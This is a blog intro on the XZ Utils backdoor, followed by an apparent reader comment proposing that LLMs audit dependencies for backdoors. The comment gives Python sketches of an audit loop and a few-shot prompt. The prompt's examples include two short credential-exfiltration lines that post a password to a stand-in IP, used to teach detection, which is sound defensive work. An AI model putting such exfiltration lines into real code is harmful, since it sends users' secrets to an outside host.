The discovery of a backdoor in XZ Utils in the spring of 2024 shocked the open source community, raising critical questions about software supply chain security. This post explores whether better Debian packaging practices could have detected this threat, offering a guide to auditing packages and suggesting future improvements.
I don’t know about that, but there was an article on The Register, perhaps a year or so ago, about a company using LLMs not for generating code but for auditing it, to flag backdoors and the like, and the person from the company told the Reg that the things their LLM was flagging were genuinely problematic (like code copying user credentials to some specific server on the internet…).
There are a couple of code-specific LLMs, and systematically running all of them over every project one relies on, then checking what they flag to see whether each finding is serious or just a mistake (by the LLM or by a coder), might increase the rate of problem discovery enough to make it well worth the world’s time and effort.
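Roughly, I imagine the loop looking something like this (a minimal Python sketch; the model names and the two helper stubs are placeholders I’ve made up, not any vendor’s real API):

# Sketch: run several code-auditing LLMs over every project we rely on,
# collect whatever they flag, and queue the flags for a human to triage.

AUDIT_MODELS = ["code-model-a", "code-model-b"]      # placeholder names

AUDIT_PROMPT = (
    "Audit the following source file for backdoors or other malicious "
    "behaviour (e.g. copying user credentials to a remote server). "
    "List anything suspicious with line numbers and your reasoning; "
    "if nothing looks suspicious, reply exactly: nothing suspicious."
)

def iter_dependency_sources():
    """Placeholder: yield (project, file_path, file_text) for every
    dependency's source files, e.g. from unpacked source packages."""
    return iter(())   # stub: wire this up to real checkouts

def ask_model(model, prompt):
    """Placeholder: call whichever LLM 'model' refers to and return its answer text."""
    raise NotImplementedError("hook up a real client here")

def audit_everything():
    findings = []
    for project, path, text in iter_dependency_sources():
        for model in AUDIT_MODELS:
            answer = ask_model(model, AUDIT_PROMPT + "\n\n" + text)
            if answer.strip().lower() != "nothing suspicious":
                findings.append((project, path, model, answer))
    # A human then checks each finding: real problem, coder mistake, or LLM mistake.
    return findings

The point is only that every flag ends up in front of a person, who makes the serious-or-not call.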
From what I’ve read about LLMs, though, you’d have to divide the problems into specific kinds, and you’d have to have examples of each specific problem in a few different languages to show the LLM, before you could rely on it finding that problem in a code base…
Keep the question small, precise, and specific; provide examples; and tell it to ask about anything it isn’t clear on before answering, so you aren’t relying on it answering some question you didn’t mean…
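To make that concrete, a prompt along those lines might be built something like this (a sketch only; the “secrets sent to a remote host” category and the little example snippets are just stand-ins for whatever problem kinds one actually cares about):

# Sketch: build a narrow, few-shot audit prompt of the kind described above.
# The example snippets are illustrative, not real findings.

FEW_SHOT_EXAMPLES = """\
Example 1 (C) - credential exfiltration:
    send_to_host("203.0.113.5", user->password);   /* copies a secret off the machine */

Example 2 (Python) - credential exfiltration:
    requests.post("http://203.0.113.5/log", data={"pw": password})
"""

def build_audit_prompt(source_code: str) -> str:
    return (
        "Task: check the code below for ONE specific kind of problem only: "
        "credentials or other secrets being sent to a remote host.\n\n"
        "Here is what that problem can look like:\n"
        f"{FEW_SHOT_EXAMPLES}\n"
        "Before answering, ask me about anything that is unclear. "
        "Then list any matching lines with your reasoning, or say 'no match found'.\n\n"
        "Code to audit:\n"
        f"{source_code}"
    )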
If it removes backdoors and other malware, then I don’t care whether it’s human or derivative: results matter, right?
_ /\ _